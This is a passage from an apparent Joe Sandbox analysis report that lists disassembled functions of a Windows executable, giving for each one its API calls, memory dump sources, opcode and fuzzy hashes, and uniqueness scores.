                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateErrorLastProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2919029540-0
                                                                                                                                                                                                                                  • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                                                                                                                  • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040ADD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                                                                                                                                                  • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4097029671-0
                                                                                                                                                                                                                                  • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                                                                                                                  • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EEA4 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                                                                                                                  • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CurrentEnumWindows
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2396873506-0
                                                                                                                                                                                                                                  • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                                                                                                                                  • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452C80 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastMove
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 55378915-0
                                                                                                                                                                                                                                  • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                                                                                                                                  • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452770 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                                                                                  • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                                                                                                                                  • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452AE0 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B19
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00452B3F,?,?,00000000), ref: 00452B21
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1799206407-0
                                                                                                                                                                                                                                  • Opcode ID: d52f41051aeef7c94b755a56baf9b5aca084de999b45dde244c03d315cd33636
                                                                                                                                                                                                                                  • Instruction ID: ab2d8551c2587fa33e08e03b3339d41412f2fea6ae8ede581cb29ed56d474115
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d52f41051aeef7c94b755a56baf9b5aca084de999b45dde244c03d315cd33636
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDF0FC71A04708ABCB11EF759D414AEB7E8EB4A32575047B7FC14E3282D7B86E04859C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042323C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CursorLoad
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3238433803-0
                                                                                                                                                                                                                                  • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                                                                                                                                  • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042E394 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2987862817-0
                                                                                                                                                                                                                                  • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                                                                                                                                  • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046E0E4 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00000344,0046E17A), ref: 0046E0EE
                                                                                                                                                                                                                                  • 756FE550.OLE32(00499B98,00000000,00000001,00499BA8,?,00000344,0046E17A), ref: 0046E10A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: E550Version
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1323609852-0
                                                                                                                                                                                                                                  • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                                                                                                                                  • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047C88B Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                                                                                                                                                                  • 757283B0.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 757283FolderKnownPath
                                                                                                                                                                                                                                  • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                                                                                                                                  • API String ID: 733073498-544719455
                                                                                                                                                                                                                                  • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                                                                                                                                  • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004508F8 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                                                                                                                                                                    • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                  • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                                                                                                                                                  • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040625C Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$Alloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2558781224-0
                                                                                                                                                                                                                                  • Opcode ID: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                                                                                                                                                  • Instruction ID: 06179efae1cd4c7c45065c0f91b58358bdd8bb936cab03a6fa385f12497be06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38fdb687bb69d238822be17628ba02d3430ff360103c12c92fad93c094244837
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E9002C4D10B00B8DC0072B20C1AD3F146CD8C172D3D0486F7004B61C3883C88004839
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
